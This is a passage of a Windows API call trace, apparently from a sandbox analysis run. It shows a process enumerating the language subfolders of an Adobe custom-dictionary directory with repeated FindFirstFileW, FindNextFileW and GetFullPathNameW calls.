lpFilePart=0x0) returned 0x5c [0050.087] GetLastError () returned 0x12 [0050.087] SetErrorMode (uMode=0x1) returned 0x0 [0050.087] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.087] GetLastError () returned 0x12 [0050.087] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.087] GetLastError () returned 0x12 [0050.087] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.087] GetLastError () returned 0x12 [0050.087] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.087] SetErrorMode (uMode=0x0) returned 0x1 [0050.087] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", lpFilePart=0x0) returned 0x5c [0050.087] GetLastError () returned 0x12 [0050.087] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.087] GetLastError () returned 0x12 [0050.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.087] GetLastError () returned 0x12 [0050.087] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", lpFilePart=0x0) returned 0x5c [0050.087] GetLastError () returned 0x12 [0050.087] SetErrorMode (uMode=0x1) returned 0x0 [0050.087] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.088] GetLastError () returned 0x12 [0050.088] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.088] GetLastError () returned 0x12 [0050.088] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.088] GetLastError () returned 0x12 [0050.088] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.088] SetErrorMode (uMode=0x0) returned 0x1 [0050.088] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan", lpFilePart=0x0) returned 0x5c [0050.088] GetLastError () returned 0x12 [0050.088] SetErrorMode (uMode=0x1) returned 0x0 [0050.088] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.088] GetLastError () returned 0x12 [0050.088] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.088] GetLastError () returned 0x12 [0050.088] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.089] GetLastError () returned 0x12 [0050.089] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.089] SetErrorMode (uMode=0x0) returned 0x1 [0050.089] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", lpFilePart=0x0) returned 0x5c [0050.089] GetLastError () returned 0x12 [0050.089] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.089] GetLastError () returned 0x12 [0050.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.089] GetLastError () returned 0x12 [0050.089] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", lpFilePart=0x0) returned 0x5c [0050.089] GetLastError () returned 0x12 [0050.089] SetErrorMode (uMode=0x1) returned 0x0 [0050.089] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.089] GetLastError () returned 0x12 [0050.089] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.089] GetLastError () returned 0x12 [0050.089] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.089] GetLastError () returned 0x12 [0050.089] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.089] SetErrorMode (uMode=0x0) returned 0x1 [0050.089] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut", lpFilePart=0x0) returned 0x5c [0050.089] GetLastError () returned 0x12 [0050.089] SetErrorMode (uMode=0x1) returned 0x0 [0050.089] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.089] GetLastError () returned 0x12 [0050.089] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.090] GetLastError () returned 0x12 [0050.090] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.090] GetLastError () returned 0x12 [0050.090] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.090] SetErrorMode (uMode=0x0) returned 0x1 [0050.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", lpFilePart=0x0) returned 0x5c [0050.090] GetLastError () returned 0x12 [0050.090] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.090] GetLastError () returned 0x12 [0050.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.090] GetLastError () returned 0x12 [0050.090] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", lpFilePart=0x0) returned 0x5c [0050.090] GetLastError () returned 0x12 [0050.090] SetErrorMode (uMode=0x1) returned 0x0 [0050.090] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.091] GetLastError () returned 0x12 [0050.091] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.091] GetLastError () returned 0x12 [0050.091] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.091] GetLastError () returned 0x12 [0050.091] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.091] SetErrorMode (uMode=0x0) returned 0x1 [0050.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng", lpFilePart=0x0) returned 0x5c [0050.091] GetLastError () returned 0x12 [0050.091] SetErrorMode (uMode=0x1) returned 0x0 [0050.091] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.091] GetLastError () returned 0x12 [0050.091] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.091] GetLastError () returned 0x12 [0050.091] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.091] GetLastError () returned 0x12 [0050.091] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.091] SetErrorMode (uMode=0x0) returned 0x1 [0050.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est", lpFilePart=0x0) returned 0x5c [0050.091] GetLastError () returned 0x12 [0050.091] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.091] GetLastError () returned 0x12 [0050.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.091] GetLastError () returned 0x12 [0050.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est", lpFilePart=0x0) returned 0x5c [0050.091] GetLastError () returned 0x12 [0050.091] SetErrorMode (uMode=0x1) returned 0x0 [0050.092] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.092] GetLastError () returned 0x12 [0050.092] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.092] GetLastError () returned 0x12 [0050.092] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.092] GetLastError () returned 0x12 [0050.092] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.092] SetErrorMode (uMode=0x0) returned 0x1 [0050.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est", lpFilePart=0x0) returned 0x5c [0050.092] GetLastError () returned 0x12 [0050.092] SetErrorMode (uMode=0x1) returned 0x0 [0050.092] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\est\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.092] GetLastError () returned 0x12 [0050.092] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.093] GetLastError () returned 0x12 [0050.093] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.093] GetLastError () returned 0x12 [0050.093] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.093] SetErrorMode (uMode=0x0) returned 0x1 [0050.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin", lpFilePart=0x0) returned 0x5c [0050.093] GetLastError () returned 0x12 [0050.093] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.093] GetLastError () returned 0x12 [0050.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.093] GetLastError () returned 0x12 [0050.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin", lpFilePart=0x0) returned 0x5c [0050.093] GetLastError () returned 0x12 [0050.093] SetErrorMode (uMode=0x1) returned 0x0 [0050.093] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.093] GetLastError () returned 0x12 [0050.093] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.093] GetLastError () returned 0x12 [0050.093] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.093] GetLastError () returned 0x12 [0050.093] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.093] SetErrorMode (uMode=0x0) returned 0x1 [0050.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin", lpFilePart=0x0) returned 0x5c [0050.093] GetLastError () returned 0x12 [0050.093] SetErrorMode (uMode=0x1) returned 0x0 [0050.093] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\fin\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.094] GetLastError () returned 0x12 [0050.094] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.094] GetLastError () returned 0x12 [0050.094] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.094] GetLastError () returned 0x12 [0050.094] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.094] SetErrorMode (uMode=0x0) returned 0x1 [0050.094] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", lpFilePart=0x0) returned 0x5c [0050.094] GetLastError () returned 0x12 [0050.094] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.094] GetLastError () returned 0x12 [0050.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.094] GetLastError () returned 0x12 [0050.094] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", lpFilePart=0x0) returned 0x5c [0050.094] GetLastError () returned 0x12 [0050.094] SetErrorMode (uMode=0x1) returned 0x0 [0050.094] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.094] GetLastError () returned 0x12 [0050.094] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.094] GetLastError () returned 0x12 [0050.094] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.095] GetLastError () returned 0x12 [0050.095] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.095] SetErrorMode (uMode=0x0) returned 0x1 [0050.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn", lpFilePart=0x0) returned 0x5c [0050.095] GetLastError () returned 0x12 [0050.095] SetErrorMode (uMode=0x1) returned 0x0 [0050.095] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.095] GetLastError () returned 0x12 [0050.095] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.095] GetLastError () returned 0x12 [0050.095] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.095] GetLastError () returned 0x12 [0050.095] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.095] SetErrorMode (uMode=0x0) returned 0x1 [0050.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre", lpFilePart=0x0) returned 0x5c [0050.095] GetLastError () returned 0x12 [0050.095] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.095] GetLastError () returned 0x12 [0050.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.095] GetLastError () returned 0x12 [0050.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre", lpFilePart=0x0) returned 0x5c [0050.095] GetLastError () returned 0x12 [0050.095] SetErrorMode (uMode=0x1) returned 0x0 [0050.095] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.095] GetLastError () returned 0x12 [0050.095] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.095] GetLastError () returned 0x12 [0050.096] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.096] GetLastError () returned 0x12 [0050.096] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.096] SetErrorMode (uMode=0x0) returned 0x1 [0050.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre", lpFilePart=0x0) returned 0x5c [0050.096] GetLastError () returned 0x12 [0050.096] SetErrorMode (uMode=0x1) returned 0x0 [0050.096] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\gre\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.096] GetLastError () returned 0x12 [0050.096] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.096] GetLastError () returned 0x12 [0050.096] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.096] GetLastError () returned 0x12 [0050.096] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.096] SetErrorMode (uMode=0x0) returned 0x1 [0050.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", lpFilePart=0x0) returned 0x5c [0050.096] GetLastError () returned 0x12 [0050.096] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.096] GetLastError () returned 0x12 [0050.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.096] GetLastError () returned 0x12 [0050.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", lpFilePart=0x0) returned 0x5c [0050.096] GetLastError () returned 0x12 [0050.096] SetErrorMode (uMode=0x1) returned 0x0 [0050.096] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.097] GetLastError () returned 0x12 [0050.097] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.097] GetLastError () returned 0x12 [0050.097] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.097] GetLastError () returned 0x12 [0050.097] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.097] SetErrorMode (uMode=0x0) returned 0x1 [0050.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm", lpFilePart=0x0) returned 0x5c [0050.097] GetLastError () returned 0x12 [0050.097] SetErrorMode (uMode=0x1) returned 0x0 [0050.097] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.097] GetLastError () returned 0x12 [0050.097] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.097] GetLastError () returned 0x12 [0050.097] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.097] GetLastError () returned 0x12 [0050.097] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.097] SetErrorMode (uMode=0x0) returned 0x1 [0050.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb", lpFilePart=0x0) returned 0x5c [0050.097] GetLastError () returned 0x12 [0050.097] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.097] GetLastError () returned 0x12 [0050.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: 